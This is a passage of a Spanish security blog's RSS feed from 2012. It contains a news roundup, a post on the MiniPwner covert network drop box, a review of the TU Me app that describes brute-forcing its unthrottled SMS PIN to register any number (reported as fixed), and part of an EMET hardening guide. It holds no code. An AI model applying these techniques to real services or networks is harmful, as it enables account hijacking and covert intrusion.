&lt;li style="text-align: justify;"&gt;&lt;b&gt;Bitcoinica&lt;/b&gt;, una página de comercio de Bitcoin creada por Zhou Tong de 17 años, ha sido &lt;a href="http://bitcoinica.blogspot.com.es/2012/05/bitcoinica-security-breach.html" target="_blank"&gt;cerrada debido a que se están llevando a cabo una serie de investigaciones de seguridad&lt;/a&gt;. Se cree que se ha podido robar casi 18,000 BTC (equivalentes a más de 68,000 euros), tras que &lt;a href="https://bitcointalk.org/index.php?topic=81045.msg896112#msg896112" target="_blank"&gt;el creador comenzó a notar transferencias sospechosas&lt;/a&gt;.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/" target="_blank"&gt;Vulnerabilidad en node.js&lt;/a&gt;, en versiones anteriores a la 0.6.17, permitiendo la fuga de información.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Publicada la&amp;nbsp;&lt;a href="https://blog.torproject.org/blog/tails-011-out" target="_blank"&gt;versión 0.11 de Tails&lt;/a&gt;, la distribución enfocada a anonimizar al máximo nuestras tareas de navegación promovida por el proyecto Tor, y de la que ya os hablamos en &lt;a href="http://www.securitybydefault.com/2012/01/tails-distribucion-que-preserva-tu.html" target="_blank"&gt;este post.&lt;/a&gt;&amp;nbsp;Muchas mejoras y nuevas funcionalidades.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Una actualización del sistema operativo Lion de Apple, la 10.7.3, &lt;a href="http://apple%20update%20to%20os%20x%20lion%20exposes%20encryption%20passwords/"&gt;expone en claro la contraseña de cifrado de los usuarios&lt;/a&gt; que utilizan la aplicación FileVault.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://eromang.zataz.com/2012/04/30/oracle-database-tns-poison-0day-video-demonstration/"&gt;Demostración en &lt;b&gt;video&lt;/b&gt; de la vulnerabilidad CVE-2012-1675&lt;/a&gt;, correspondiente con el &lt;b&gt;&lt;i&gt;TNS Poison de Oracle de &lt;a href="http://www.twitter.com/matalaz"&gt;Joxean Koret.&lt;/a&gt;&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Adrián Bravo en&amp;nbsp;&lt;a href="http://securityetalii.es/"&gt;Security Et Alii&lt;/a&gt; nos presenta dos &lt;a href="http://securityetalii.es/2012/05/08/sqlol-y-xmlmao-web-hacking-testbeds/"&gt;entornos para realizar pruebas de hacking web, concretamente de Inyección SQL y XPath/XML Injection&lt;/a&gt;, SQLol y XMLmao respectivamente.&lt;/li&gt;
&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-3197945992566874862?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/hzJiV60Pznc" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/hzJiV60Pznc/enlaces-de-la-secmana-123.html</link><author>noreply@blogger.com (José A. Guasch)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_fWA7DVpD2eo/TG6clsxg-qI/AAAAAAAAAek/nE1WBc8GrT0/s72-c/informe-secmanal-banner.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/enlaces-de-la-secmana-123.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-645819506467530253</guid><pubDate>Fri, 11 May 2012 06:01:00 +0000</pubDate><atom:updated>2012-05-11T08:38:01.606+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ethernet exposed</category><category domain="http://www.blogger.com/atom/ns#">herramientas</category><category domain="http://www.blogger.com/atom/ns#">hardware</category><title>MiniPwner: Saca partido a tus ETHERNET EXPOSED</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-P7nxUt2CFy8/T6ymUbMXrdI/AAAAAAAAADg/6WwJTKszjck/s1600/minipwner-logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="68" src="http://3.bp.blogspot.com/-P7nxUt2CFy8/T6ymUbMXrdI/AAAAAAAAADg/6WwJTKszjck/s400/minipwner-logo.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Mucha gente nos ha preguntado el por qué de la &lt;a href="http://www.securitybydefault.com/search/label/ethernet%20exposed" target="_blank"&gt;sección ETHERNET EXPOSED&lt;/a&gt;, e incluso muchos otros han cuestionado si realmente es importante disponer de tomas de red descuidadas y si realmente pueden ser aprovechadas.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-0SDOyeqLLlE/TumfNr0k_KI/AAAAAAAAA4E/1Y-0D0I_uew/s320/cajero-ban-003.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-0SDOyeqLLlE/TumfNr0k_KI/AAAAAAAAA4E/1Y-0D0I_uew/s320/cajero-ban-003.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Ayer se dió a conocer una nueva &lt;i&gt;Drop Box&lt;/i&gt;, llamada &lt;a href="http://www.minipwner.com/" target="_blank"&gt;&lt;i&gt;MiniPwner&lt;/i&gt;,&lt;/a&gt; cuyo atractivo principal es su precio (se puede tener por menos de 50$), que resulta ser mucho más asequible que la ya conocida por todos &lt;i&gt;&lt;a href="http://pwnieexpress.com/" target="_blank"&gt;Pwnie Express&lt;/a&gt;&lt;/i&gt; (casi 500$).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Estos dispositivos proporcionan el acceso remoto a una red, y sus principales ventajas es su reducido tamaño, por lo que bien pueden pasar desapercibidos.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-EwlQmiPtQUg/T6yn4gtofgI/AAAAAAAAADo/wGotUzxfLCo/s1600/mainiphone.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="215" src="http://2.bp.blogspot.com/-EwlQmiPtQUg/T6yn4gtofgI/AAAAAAAAADo/wGotUzxfLCo/s320/mainiphone.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En el caso de MiniPwner, se trata de un router wireless TP-Link TL-WR703N y un puerto Giga, así como un sistema operativo OpenWRT en el que se han instalado herramientas específicas para tareas de pentesting, como son nmap, tcpdump, nbtscan, etc. ofreciendo la posibilidad de establecer túneles VPN para ejecutar otras herramientas externamente pero manteniendo el acceso. Una vez se coloca en la red, nos podemos conectar mediante WiFi desde una localización próxima y tranquilamente trabajar sobre la red a la que nos hemos conectado. Y como ya habréis visto &lt;a href="http://www.securitybydefault.com/search/label/ethernet%20exposed" target="_blank"&gt;en los diferentes números de ETHERNET EXPOSED,&lt;/a&gt; podríamos acceder a redes de bancos, hospitales, restaurantes, clínicas...siempre y cuando las tomas encontradas ofreciesen un enlace real.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En este enlace del propio producto MiniPwner encontraréis otros &lt;a href="http://www.minipwner.com/index.php/f-bomb-pwnie-wifi-pineapple" target="_blank"&gt;proyectos relacionados con estos dispositivos Drop Box&lt;/a&gt;, como por ejemplo la &lt;a href="http://hakshop.myshopify.com/products/wifi-pineapple" target="_blank"&gt;WiFi Pineapple de la gente de Hak5&lt;/a&gt;: es una fonera escondida dentro de una piña de plástico que aparentemente no es más que un recipiente para zumos, pero que es capaz de crear un punto de acceso WiFi &lt;i&gt;Rogue&lt;/i&gt; para "obligar" a los usuarios cercanos a nosotros que se conecten a nuestro punto de acceso haciéndolos creer que es de confianza.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Puedes &lt;b&gt;construir tú mismo tu propia versión de MiniPwner&lt;/b&gt; siguiendo &lt;a href="http://www.minipwner.com/index.php/minipwner-build" target="_blank"&gt;este enlace&lt;/a&gt;, o directamente pedirlo por 120$ &lt;a href="http://www.minipwner.com/index.php/buy-a-minipwner" target="_blank"&gt;en esta otra dirección.&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] &lt;a href="http://www.minipwner.com/index.php/what-is-the-minipwner" target="_blank"&gt;MiniPwner&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-645819506467530253?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/TxG_5Ra3etw" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/TxG_5Ra3etw/minipwner-saca-partido-tus-ethernet_11.html</link><author>noreply@blogger.com (José A. Guasch)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-P7nxUt2CFy8/T6ymUbMXrdI/AAAAAAAAADg/6WwJTKszjck/s72-c/minipwner-logo.png" height="72" width="72" /><thr:total>10</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/minipwner-saca-partido-tus-ethernet_11.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-7177292786591247829</guid><pubDate>Thu, 10 May 2012 06:23:00 +0000</pubDate><atom:updated>2012-05-12T09:11:16.548+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">mensajeria</category><category domain="http://www.blogger.com/atom/ns#">voip</category><category domain="http://www.blogger.com/atom/ns#">ios</category><category domain="http://www.blogger.com/atom/ns#">tume</category><category domain="http://www.blogger.com/atom/ns#">iphone</category><title>Registra cualquier número en TU Me</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-uuDb6pWEulk/T6r_QX9s2CI/AAAAAAAAG-8/EVkhc3NIK8o/s1600/tume.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://4.bp.blogspot.com/-uuDb6pWEulk/T6r_QX9s2CI/AAAAAAAAG-8/EVkhc3NIK8o/s200/tume.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La entrada de hoy pretende ser un &lt;b&gt;resumen rápido&lt;/b&gt; desde el punto de vista de &lt;b&gt;seguridad &lt;/b&gt;de la aplicación &lt;a href="http://tumeapp.com/"&gt;&lt;b&gt;TU Me&lt;/b&gt;&lt;/a&gt;, presentada ayer por Telefónica para móviles &lt;b&gt;iPhone&lt;/b&gt; y que se ha mostrado en Internet como la competencia de WhatsApp.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Detrás&lt;/b&gt; de TU Me se encuentra la &lt;b&gt;compañía&amp;nbsp;&lt;a href="http://platform.jajah.com/company/about"&gt;jajah&lt;/a&gt;&lt;/b&gt;, con sede en California pero origen israelí, está&amp;nbsp;&lt;b&gt;especializada en VoIP&lt;/b&gt; y fue &lt;b&gt;adquirida por Telefónica en 2010&lt;/b&gt;. Por lo que parece, todo ha sido desarrollado fuera de España y sus &lt;b&gt;sistemas &lt;/b&gt;también se encuentran en &lt;b&gt;California&lt;/b&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Teniendo en cuenta la experiencia ganada de ver como funciona WhatsApp he comprobado algunos de los fallos que hemos encontrado y contado. En algunos casos los resultados son buenas noticias y en otros no.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El &lt;b&gt;registro&amp;nbsp;solo &lt;/b&gt;se puede hacer mediante la recepción de un &lt;b&gt;SMS&lt;/b&gt;, &lt;b&gt;sin &lt;/b&gt;posibilidad de recibir una &lt;b&gt;llamada &lt;/b&gt;u &lt;a href="http://www.securitybydefault.com/2011/06/como-registrar-cualquier-numero-de.html"&gt;otro método de validación&lt;/a&gt;, como ocurre con su amigo verde.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-_HqyrJLWAoo/T6sKk820DTI/AAAAAAAAG_k/mgzHBi0-H8k/s1600/tume.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-_HqyrJLWAoo/T6sKk820DTI/AAAAAAAAG_k/mgzHBi0-H8k/s320/tume.png" width="213" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Cuando se introduce el &lt;b&gt;número&lt;/b&gt;, se manda una &lt;b&gt;petición https&lt;/b&gt; con ese número de móvil, TU Me &lt;b&gt;responde &lt;/b&gt;por &lt;b&gt;SMS&lt;/b&gt; un &lt;b&gt;código pin&lt;/b&gt; de tan solo cuatro números para verificar que ese teléfono es de nuestra propiedad, ya que como último paso hay que &lt;b&gt;introducirlo en la aplicación&lt;/b&gt;, para que sea nuevamente valido. El proceso tendría un esquema similar a esto:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-GdtUYqnkMbE/T6sWh8qUdfI/AAAAAAAAG_w/KVAbar4kBCM/s1600/login.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-GdtUYqnkMbE/T6sWh8qUdfI/AAAAAAAAG_w/KVAbar4kBCM/s400/login.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Registro en TU Me&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="color: red;"&gt;&lt;b&gt;---------------------&lt;/b&gt;&lt;b&gt;---------------------&lt;/b&gt;&lt;b&gt;---------------------&lt;/b&gt;&lt;b&gt;--------&lt;/b&gt;&lt;b&gt;-------&lt;/b&gt;&lt;b&gt;---------------------&lt;/b&gt;&lt;b&gt;-----------&lt;/b&gt;&lt;b&gt;-------------&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;span style="color: red;"&gt;ACTUALIZACIÓN:&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: red;"&gt;Lo comentado a continuación ha sido solucionado a las pocas horas de publicarse esta información en el blog.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-LToLpfkY0Ho/T64M82r4uhI/AAAAAAAAHAk/s_Zjn-Xt7tY/s1600/tumeapp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="165" src="http://2.bp.blogspot.com/-LToLpfkY0Ho/T64M82r4uhI/AAAAAAAAHAk/s_Zjn-Xt7tY/s400/tumeapp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;b&gt;---------------------&lt;/b&gt;&lt;b&gt;---------------------&lt;/b&gt;&lt;b&gt;---------------------&lt;/b&gt;&lt;b&gt;---------------------&lt;/b&gt;&lt;b&gt;-------&lt;/b&gt;&lt;b&gt;---------------------&lt;/b&gt;&lt;b&gt;------------&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Desgraciadamente el número de veces que se introduce el PIN no está controlado y con una &lt;a href="http://www.securitybydefault.com/2011/11/uso-de-burp-intruder-para-ataques-de.html"&gt;herramienta como burp&lt;/a&gt; es muy&amp;nbsp;fácil&amp;nbsp;&lt;b&gt;&lt;u&gt;automatizar el proceso y registrar el número que queramos&lt;/u&gt;&lt;/b&gt; en unos minutos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-fG2Gucmwj4M/T6sappkdgOI/AAAAAAAAG_8/j6WENTkIfqo/s1600/intruder.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-fG2Gucmwj4M/T6sappkdgOI/AAAAAAAAG_8/j6WENTkIfqo/s320/intruder.png" width="299" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En otro orden de cosas, revisando el directorio de la aplicación y la base de &lt;b&gt;datos de conversaciones &lt;/b&gt;que se almacena&amp;nbsp;en&amp;nbsp;el fichero&amp;nbsp;&lt;b&gt;Connect.sqlite&lt;/b&gt;, me he encontrado que guarda la geo localización de todos los mensajes. Aunque no sea necesaria ni se solicite. Una vez mandas tu posición, los siguientes mensajes también llevarán esta información. Con todo lo que ello implica. ¡&lt;a href="http://www.securitybydefault.com/2011/06/lo-que-no-te-cuenta-whatsapp.html"&gt;No hemos aprendido&lt;/a&gt;!&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-OG55oM0dTi0/T6sDvinQqKI/AAAAAAAAG_I/QGM04Xa203g/s1600/geo.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="283" src="http://1.bp.blogspot.com/-OG55oM0dTi0/T6sDvinQqKI/AAAAAAAAG_I/QGM04Xa203g/s400/geo.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Connect.sqlite (geolocalización)&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La sorpresa, esta vez buena, ha sido encontrar que las&amp;nbsp;imágenes&amp;nbsp;compartidas no son públicas y requieren autenticación para acceder a ellas. Además de estar solo disponibles por SSL, a diferencia de WhatsApp que cualquiera puede acceder a ellas si conoce la ruta y se sirven sin cifrar.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-267N-LR1gvk/T6sEtidGCJI/AAAAAAAAG_Y/4HUJzRaEauI/s1600/storage1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="203" src="http://4.bp.blogspot.com/-267N-LR1gvk/T6sEtidGCJI/AAAAAAAAG_Y/4HUJzRaEauI/s400/storage1.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Almacenamiento de&amp;nbsp;imágenes&amp;nbsp;en https://store.yarnapp.com&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-ZFam6RznWsE/T6sEsKQ0PfI/AAAAAAAAG_Q/CgdUj9O8i3c/s1600/storage.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;img border="0" height="52" src="http://1.bp.blogspot.com/-ZFam6RznWsE/T6sEsKQ0PfI/AAAAAAAAG_Q/CgdUj9O8i3c/s400/storage.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Intento de acceso a una imagen sin credenciales&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;br /&gt;
También las &lt;b&gt;conversaciones &lt;/b&gt;se hacen usando &lt;b&gt;protocolos cifrados&lt;/b&gt;, por lo que será&amp;nbsp;difícil&amp;nbsp;encontrar herramientas del tipo &lt;a href="http://www.securitybydefault.com/2012/01/whatsapp-al-descubierto.html"&gt;WhatsAppSniffer&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
De momento, ¡esto es todo!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-7177292786591247829?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/yfonYgU-aa8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/yfonYgU-aa8/registra-cualquier-numero-en-tu-me.html</link><author>noreply@blogger.com (Alejandro Ramos)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-uuDb6pWEulk/T6r_QX9s2CI/AAAAAAAAG-8/EVkhc3NIK8o/s72-c/tume.jpg" height="72" width="72" /><thr:total>10</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/registra-cualquier-numero-en-tu-me.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-8512457500223656219</guid><pubDate>Wed, 09 May 2012 04:23:00 +0000</pubDate><atom:updated>2012-05-09T06:23:03.186+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">dep</category><category domain="http://www.blogger.com/atom/ns#">contribuciones</category><category domain="http://www.blogger.com/atom/ns#">aslr</category><category domain="http://www.blogger.com/atom/ns#">emet</category><title>Configurando EMETv2.1</title><description>&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5677829531621320098" src="http://4.bp.blogspot.com/-THDEetWWqWg/Tsuz4GeC5aI/AAAAAAAAAL4/DGwe_AlLwS4/s200/EMET_Logo.png" style="cursor: pointer; float: left; height: 119px; margin: 0pt 10px 10px 0pt; width: 135px;" /&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Como ya se ha visto en los posts anteriores (&lt;a href="http://www.securitybydefault.com/2012/03/mitigaciones-de-seguridad-en-emetv21-i.html" target="_blank"&gt;Mitigaciones de seguridad en EMETv2.1 I&lt;/a&gt;, &lt;a href="http://www.securitybydefault.com/2012/04/mitigaciones-de-seguridad-en-emetv21-ii.html" target="_blank"&gt;II&lt;/a&gt; y &lt;a href="http://www.securitybydefault.com/2012/04/mitigaciones-de-seguridad-en-emetv21.html" target="_blank"&gt;III&lt;/a&gt;), &lt;span style="font-style: italic;"&gt;EMET &lt;/span&gt;es un &lt;b&gt;programa muy útil para incrementar la seguridad del sistema.&lt;/b&gt; Permite añadir mitigaciones de seguridad a aplicaciones que no han sido programadas nativamente para soportarlas. Esto permite que incluso queden protegidas ante vulnerabilidades 0-day que en otras condiciones podrían hacer que el sistema fuese vulnerable a ejecución de código, por ejemplo&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-style: italic;"&gt;EMET &lt;/span&gt;soporta diferentes versiones de Windows y niveles de parcheo, pero no todas las mitigaciones están disponibles para todos ellos.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://1.bp.blogspot.com/-Ko2lpMfdnOE/T2iTlH4ig0I/AAAAAAAAAOo/7B6wfSjNcag/s1600/SOs_EMET.png"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5721985592554849090" src="http://1.bp.blogspot.com/-Ko2lpMfdnOE/T2iTlH4ig0I/AAAAAAAAAOo/7B6wfSjNcag/s400/SOs_EMET.png" style="cursor: hand; cursor: pointer; display: block; height: 194px; margin: 0px auto 10px; text-align: center; width: 400px;" /&gt;&lt;/a&gt;&lt;br /&gt;
Lo mismo sucede con sistemas de 32 y 64 bits, ya que algunas protecciones sólo están disponibles en 32 bits.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://4.bp.blogspot.com/--Q-GWQPXstM/T2iT3VMM-cI/AAAAAAAAAO0/FfxihFODtqw/s1600/32-64%2BEMET.png"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5721985905364629954" src="http://4.bp.blogspot.com/--Q-GWQPXstM/T2iT3VMM-cI/AAAAAAAAAO0/FfxihFODtqw/s400/32-64%2BEMET.png" style="cursor: hand; cursor: pointer; display: block; height: 128px; margin: 0px auto 10px; text-align: center; width: 400px;" /&gt;&lt;/a&gt;&lt;br /&gt;
Gracias a los posts anteriores conocemos qué protecciones ofrece &lt;span style="font-style: italic;"&gt;EMET &lt;/span&gt;y cómo funcionan a bajo nivel. Ahora vamos a ver cómo configurar &lt;span style="font-style: italic;"&gt;EMET &lt;/span&gt;para sacarle el máximo partido.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;Aplicar mitigaciones&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Existen dos formas de configurar las protecciones: a nivel de sistema o de ejecutables. Éstas no son mutuamente excluyentes, sino complementarias.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://4.bp.blogspot.com/-MwWZ5QwlV2Q/T2iXFJB9ywI/AAAAAAAAAPk/armEizBODQM/s1600/captura_principal.png"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5721989441153518338" src="http://4.bp.blogspot.com/-MwWZ5QwlV2Q/T2iXFJB9ywI/AAAAAAAAAPk/armEizBODQM/s400/captura_principal.png" style="cursor: hand; cursor: pointer; display: block; height: 227px; margin: 0px auto 10px; text-align: center; width: 400px;" /&gt;&lt;/a&gt;&lt;br /&gt;
En el apartado &lt;span style="font-weight: bold;"&gt;Configure System&lt;/span&gt; podemos configurar a nivel global ciertas mitigaciones de seguridad (&lt;span style="font-style: italic;"&gt;DEP, SEHOP, ASLR&lt;/span&gt;) mediante las directivas &lt;span style="font-style: italic;"&gt;Always On&lt;/span&gt;, &lt;span style="font-style: italic;"&gt;Application Opt-Out&lt;/span&gt;, &lt;span style="font-style: italic;"&gt;Application Opt-In&lt;/span&gt;, &lt;span style="font-style: italic;"&gt;Disabled&lt;/span&gt;). Se explicó cómo funciona cada una de ellas en el apartado &lt;span style="font-style: italic;"&gt;DEP&lt;/span&gt; del primer post de la serie.&lt;br /&gt;
&lt;br /&gt;
Existen dos perfiles por defecto en esta sección. Si se utiliza &lt;u style="font-style: italic;"&gt;Maximum Protection Security&lt;/u&gt; nos podemos encontrar con que algunas aplicaciones dan problemas y no funcionan correctamete. Por eso se recomienda utilizar &lt;u style="font-style: italic;"&gt;Recommended Security Settings&lt;/u&gt;.&lt;br /&gt;
&lt;br /&gt;
